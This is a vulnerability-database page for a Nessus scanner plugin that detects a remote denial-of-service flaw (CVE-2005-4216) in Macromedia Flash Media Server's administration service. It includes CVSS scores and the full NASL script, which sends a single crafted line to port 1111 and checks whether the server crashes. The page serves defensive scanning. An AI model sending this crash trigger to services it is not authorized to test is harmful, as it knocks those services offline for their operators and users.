Lucene search

K
nessusThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.FLASH_MEDIASERVER_ADMIN_DOS.NASL
HistoryDec 14, 2005 - 12:00 a.m.

Macromedia Flash Media Server Administration Service Crafted Packet Remote DoS

2005-12-1400:00:00
This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
www.tenable.com
13

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:N/A:C

EPSS

0.398

Percentile

97.3%

The remote host appears to be using Flash Media Server.

The version of Flash Media Server installed on the remote host is affected by a flaw in its administration server that causes it to crash if it receives a single character. The administration server is used to remotely administer Flash Media Server, and this flaw can be used by an attacker to disable access to this service.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(20302);
  script_version("1.20");

  script_cve_id("CVE-2005-4216");
  script_bugtraq_id(15822);
 
  script_name(english:"Macromedia Flash Media Server Administration Service Crafted Packet Remote DoS");
  script_summary(english:"Checks for denial of service vulnerability in Flash Media Server Administration Service");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote service is prone to a remote denial of service attack." );
 script_set_attribute(attribute:"description", value:
"The remote host appears to be using Flash Media Server.

The version of Flash Media Server installed on the remote host
is affected by a flaw in its administration server that causes it to crash
if it receives a single character. The administration server 
is used to remotely administer Flash Media Server, and this flaw
can be used by an attacker to disable access to this service." );
 script_set_attribute(attribute:"solution", value:
"Limit access to this port to trusted users." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/12/14");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/12/07");
 script_cvs_date("Date: 2018/07/11 17:09:24");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
  script_category(ACT_DENIAL);
  script_family(english:"Denial of Service");
 
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 1111);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:1111);

# If it looks like FMS Administration Server...
banner = get_http_banner(port:port);
if ("Server: FlashCom/" >!< banner) exit(0, "Not a FlashCom web server");

# nb: the advisory is wrong about a single character;
#     it ignores the effect of the line endings.
w = http_send_recv_buf(port:port, data: 'X\r\n');

# There's a problem if the server's down now.
if (http_is_dead(port:port)) security_hole(port);

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:N/A:C

EPSS

0.398

Percentile

97.3%

Related for FLASH_MEDIASERVER_ADMIN_DOS.NASL